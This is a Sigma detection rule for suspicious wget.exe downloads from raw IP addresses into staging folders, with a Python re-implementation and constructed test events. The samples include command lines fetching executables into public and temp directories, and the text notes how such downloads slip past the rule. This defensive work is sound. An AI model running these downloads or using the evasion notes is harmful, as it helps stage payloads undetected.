Suspicious File Download From IP Via Wget.EXE - Paths
Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
Sigma rule (View on GitHub)
title: Suspicious File Download From IP Via Wget.EXE - Paths
id: 40aa399c-7b02-4715-8e5f-73572b493f33
status: experimental
description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
references:
    - https://www.gnu.org/software/wget/manual/wget.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-02-23
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\wget.exe'
        - OriginalFileName: 'wget.exe'
    selection_ip:
        CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
    selection_http:
        CommandLine|contains: 'http'
    selection_flag:
        - CommandLine|re: '\s-O\s'
        - CommandLine|contains: '--output-document'
    selection_paths:
        - CommandLine|contains:
              - ':\PerfLogs\'
              - ':\Temp\'
              - ':\Users\Public\'
              - ':\Windows\Help\'
              - ':\Windows\Temp\'
              - '\Temporary Internet'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Pictures\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
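To show how the five selection blocks combine under `all of selection_*`, here is an added Python re-implementation of this rule's detection logic run over constructed process_creation events; it is example code, not Sigma's matcher or the rule author's, and the tool path, user names and 203.0.113.x addresses in the samples are constructed.

```python
import re
# Added re-implementation of the rule's detection block, not Sigma's own matcher.
# Sigma contains/endswith are case-insensitive; |re is case-sensitive, so the
# two regexes keep their original case.
IP_URL_RE = re.compile(r'://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
OUTPUT_FLAG_RE = re.compile(r'\s-O\s')
SUSPICIOUS_PATHS = (':\\PerfLogs\\', ':\\Temp\\', ':\\Users\\Public\\',
                    ':\\Windows\\Help\\', ':\\Windows\\Temp\\', '\\Temporary Internet')
USER_SUBDIRS = ('\\Favorites\\', '\\Favourites\\', '\\Contacts\\', '\\Pictures\\')

def matches_rule(event: dict) -> bool:
    """True when a process_creation event satisfies every selection_* block."""
    image = event.get('Image', '').lower()
    original = event.get('OriginalFileName', '').lower()
    cmd = event.get('CommandLine', '')
    cmd_l = cmd.lower()
    selection_img = image.endswith('\\wget.exe') or original == 'wget.exe'
    selection_ip = IP_URL_RE.search(cmd) is not None
    selection_http = 'http' in cmd_l
    selection_flag = (OUTPUT_FLAG_RE.search(cmd) is not None
                      or '--output-document' in cmd_l)
    selection_paths = (any(p.lower() in cmd_l for p in SUSPICIOUS_PATHS)
                       or (':\\users\\' in cmd_l
                           and any(d.lower() in cmd_l for d in USER_SUBDIRS)))
    # condition: all of selection_*
    return all((selection_img, selection_ip, selection_http,
                selection_flag, selection_paths))

def wget_event(command_line: str) -> dict:
    # Constructed process_creation event for a wget.exe launch.
    return {'Image': 'C:\\Tools\\wget.exe', 'OriginalFileName': 'wget.exe',
            'CommandLine': command_line}

# Constructed samples; 203.0.113.0/24 is a documentation-only address range.
SAMPLE_EVENTS = [
    wget_event(r'wget.exe -O C:\Users\Public\update.exe http://203.0.113.10/update.exe'),
    wget_event(r'wget.exe --output-document=C:\Windows\Temp\a.bin http://203.0.113.10/a.bin'),
    # Hostname instead of a raw IP: selection_ip fails.
    wget_event(r'wget.exe -O C:\Users\Public\f.txt http://example.com/f.txt'),
    # Downloads is not among the listed paths: selection_paths fails.
    wget_event(r'wget.exe -O C:\Users\alice\Downloads\f.txt http://203.0.113.10/f.txt'),
    # Lowercase -o is wget's log-file option; the case-sensitive regex rejects it.
    wget_event(r'wget.exe -o C:\Users\Public\log.txt http://203.0.113.10/f.txt'),
]

def evaluate(events=SAMPLE_EVENTS) -> list:
    # Expected here: [True, True, False, False, False]
    return [matches_rule(e) for e in events]
```

The last two samples show the two easiest ways a genuine download slips past this rule: an output path outside the listed directories, or wget's lowercase `-o` log option, which the `\s-O\s` regex deliberately does not match.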